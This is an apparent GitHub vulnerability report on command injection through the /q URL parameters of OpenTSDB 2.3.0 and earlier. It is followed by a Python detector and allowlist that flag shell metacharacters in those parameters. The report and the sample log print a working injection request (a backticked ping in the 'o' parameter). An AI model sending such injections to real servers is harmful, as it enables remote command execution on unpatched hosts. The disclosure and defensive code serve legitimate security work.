url: opentsdb-a.b.com:4242/q?start=x&end=x&m=x&o=&yrange=[0:]&y2range=[0:]&key=x&style=x&wxh=x&json
payload: take the 'o' parameter as an example
request url: opentsdb-a.b.com:4242/q?start=x&end=x&m=x&o=%60ping%20-c%2010%20127.0.0.1%60&yrange=[0:]&y2range=[0:]&key=x&style=x&wxh=x&json
response: shows ping information.
ps: opentsdb-a.b.com is a host which uses the opentsdb service.
impact:
I have checked the versions below 2.3.0, including 2.3.0, 2.2.0, 2.1.4; all are vulnerable. The other versions below 2.3.0 that I haven't checked probably have the same problem.
The latest version of opentsdb (2.3.1) has fixed the vulnerability.
It's very important for users to know about this vulnerability, and to update to the latest version as soon as possible. Don't leave your server device in great danger!
mikelueng changed the title from "vulnerability! remote command execute in 'q' request method" to "vulnerability! Remote Command Execute in /q URL." on Jun 29, 2018
mikelueng changed the title from "vulnerability! Remote Command Execute in /q URL." to "vul" on Jun 29, 2018
mikelueng changed the title from "vul" to "Many parameters to the /q URL can execute command, including o, key, style, yrange and its json input, y2range and its json input." on Jul 23, 2018
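The report above names the /q parameters (o, key, style, yrange, y2range) whose values reach a shell. The following is an added example written for this page, not OpenTSDB's own code: it decodes a /q request, flags sink parameters whose decoded value contains shell metacharacters (the detection a log review or WAF rule would want), and applies a strict allowlist that a reverse proxy or the endpoint itself could enforce on those parameters. The access-log lines and the benign requests are constructed; the injected request URL is the one from the report.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the final issue title names as command-execution sinks.
SINK_PARAMS = {"o", "key", "style", "yrange", "y2range"}

# Characters that change the meaning of a shell command line and have no
# legitimate use in a plot option value.
SHELL_META = re.compile(r"[`$;|&<>\n\\]|\$\(")

# Conservative allowlist for plot options: words, digits, ranges like [0:],
# and the separators gnuplot option strings normally contain.
ALLOWED = re.compile(r"^[A-Za-z0-9 _:.,\[\]\-]*$")

# Request URL quoted in the report (ping payload in the 'o' parameter).
INJECTED_URL = (
    "opentsdb-a.b.com:4242/q?start=x&end=x&m=x"
    "&o=%60ping%20-c%2010%20127.0.0.1%60&yrange=[0:]&y2range=[0:]"
    "&key=x&style=x&wxh=x&json"
)

# Constructed nginx-style access log; only line 2 carries the report's payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Jun/2018:10:00:01 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.user&o=&yrange=[0:]&json HTTP/1.1" 200 812',
    '10.0.0.9 - - [29/Jun/2018:10:00:07 +0000] "GET /q?start=x&end=x&m=x&o=%60ping%20-c%2010%20127.0.0.1%60&yrange=[0:]&y2range=[0:]&key=x&style=x&wxh=x&json HTTP/1.1" 200 1024',
    '10.0.0.9 - - [29/Jun/2018:10:00:09 +0000] "GET /api/query?start=1h-ago&m=sum:sys.cpu.user HTTP/1.1" 200 640',
    '10.0.0.7 - - [29/Jun/2018:10:00:12 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.user&key=out%20right%20top&style=linespoint HTTP/1.1" 200 900',
]

REQ_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def split_request(target):
    """Return (path, {param: [decoded values]}) for a full URL or a request target.

    The report writes the host without a scheme; urlsplit would otherwise
    read 'opentsdb-a.b.com' as the scheme, so a dummy one is prepended.
    """
    if "://" not in target and not target.startswith("/"):
        target = "http://" + target
    parts = urlsplit(target)
    return parts.path, parse_qs(parts.query, keep_blank_values=True)


def suspicious_params(params):
    """Sink parameters whose decoded value contains a shell metacharacter."""
    return sorted(
        name for name, values in params.items()
        if name in SINK_PARAMS and any(SHELL_META.search(v) for v in values)
    )


def rejected_params(params):
    """Sink parameters that fail the allowlist (what a hardened endpoint would refuse)."""
    return sorted(
        name for name, values in params.items()
        if name in SINK_PARAMS and not all(ALLOWED.match(v) for v in values)
    )


def scan_access_log(lines):
    """Return [(line_number, [flagged params])] for /q requests carrying metacharacters."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQ_LINE.search(line)
        if not match:
            continue
        path, params = split_request(match.group(1))
        if path != "/q":
            continue
        flagged = suspicious_params(params)
        if flagged:
            hits.append((number, flagged))
    return hits


if __name__ == "__main__":
    _, injected = split_request(INJECTED_URL)
    print("metacharacters in:", suspicious_params(injected))
    print("allowlist rejects:", rejected_params(injected))
    print("log hits:", scan_access_log(SAMPLE_LOG))
```

The metacharacter check is for triage of existing logs, where an empty result is not proof of absence; the allowlist is the control to deploy, because it refuses anything outside the expected option syntax rather than trying to enumerate dangerous characters. Both run on the decoded value, since the payload in the report is percent-encoded on the wire.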